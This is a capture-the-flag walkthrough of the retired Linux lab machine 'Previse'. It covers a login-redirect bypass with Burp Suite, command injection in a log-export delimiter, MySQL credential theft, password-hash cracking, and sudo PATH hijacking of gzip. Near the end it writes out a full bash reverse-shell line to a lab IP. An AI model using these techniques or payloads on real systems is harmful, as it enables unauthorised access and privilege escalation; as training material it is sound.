Previse machine is a vulnerable machine with Linux operating system among retired machines. We are expected to detect user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of network scanning with Nmap, we found that ports 22/tcp ssh OpenSSH 7.6 and 80/tcp http Apache httpd are open.
When there is no vulnerability on port 22, we continue to look for vulnerabilities on port 80. On port 80, we continue on the browser to provide enumeration.
We did not find any valuable information on the web, we provided default password attempts with no results. we used gobsuer to provide web file and directory scanning.
As a result of directory and file scanning, the files and directories transferred in the screenshot above were detected.
We went to the detected files and directories, most of them were already redirecting to login.php, and we could not find any information in the rest.
Noteworthy here was the nav.php file, whatever we clicked there redirected to login.php. What we need to do here is to listen and change it with burp suite while redirecting.
Here it says create account, when we stop on it, it says accounts.php, we open burp suite to go to it and intervene.
We got the will here
Now let’s see our response to this request
As you can see, this returns 302 found, let’s change it to 200 Ok and make the request again
As we can see, we have access to the add new accounts page. Let’s immediately create a user
We created muhammed aygun credential information.
We were able to log in on the login page using this information.
After logging in, we continued to the enumeration section, where we drew our attention to the fields in the FILE tab, there is both the upload section, Shell can be uploaded, there is a config file, there may be a user with a password etc. The username newguy was detected in case there may be a user.
First, let’s download the backup and look for credential information in it
We could not find any credantail information.
Let’s deal with the upload part
Let’s install pentest monkey in php revershell
We were able to install it successfully. Let’s see if it works.
When it comes on dowloand.php?file=34 we click on the url address
We could not run our php revershel, we could not get our shelimiz, we continue with the enumeration part.
In the Managetmnet data section, we can separate the logs brought by the log data section in the form of comma space tab.
Let’s intervene with Burpsuite, let’s see if we can add to the delim button in the Reperter section.
Whoami and id commands did not work for some reason, we found ourselves requesting with curl to see if the command works
Good we can run commands that can send us requests, then we can getrevershell.
When we sent it without url encoded, it did not give us Shell in any way, so we sent our reverhsel url encoded using ctrl+u, this way it gave us revershell
As you can see we got our shel
Since it is www-data user, its authorization was very limited, we provide local enumeration to increase authorization.
Sql user and password detected on config.php page.
Let’s connect to mysql using this
Here we have obtained the password hashes of the users.
Let’s try to crack the password hash of user m4lwhere with john
first, we write the hash we obtained to the hash file with nano
and then we break it with hashcat.
As we can see, the resulting hash was broken as “ilovecody112235!”.
Let’s make an ssh connection to user m4lwhere
We made the ssh connection successfully and got our user flag.
We got permission denied error when we don’t have root privileges. We provide local enumeration to elevate privileges.
With the sudo -l command, we list the things that can be run with root privileges without asking for a password.
We detected the file access_backup.sh. When we viewed its content, we realized that it was zip the log files with gzip.
We can apply path hijackin here, but instead of gzip, if we create a file to create a shell for ourselves and name it gzip, we get our shell
Echo $PATH
We identified the running file locations by saying, where is the gzip file?
Which gzip
We used the command
So far we have provided local enumeraton so that we can understand the machine.
Now first of all
cd /dev/shm
We went to the shm folder so that we can write commands easily since there are no authorization restrictions etc.
export PATH=.:$PATH
Add our own path to PATH by typing the command
nano gzip
then create a file named gzip
!/bin/bash
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.13/4723 0>&1’
Let’s save and exit
chmod +x gzip
after typing the command
which gzip
we need to see our command when we type
we saw
Now, before running /opt/scripts/access_backup.sh under sudo authorization, we listen to the port we specified in reverse Shell.
And in this way we got root authorization and got our root flag.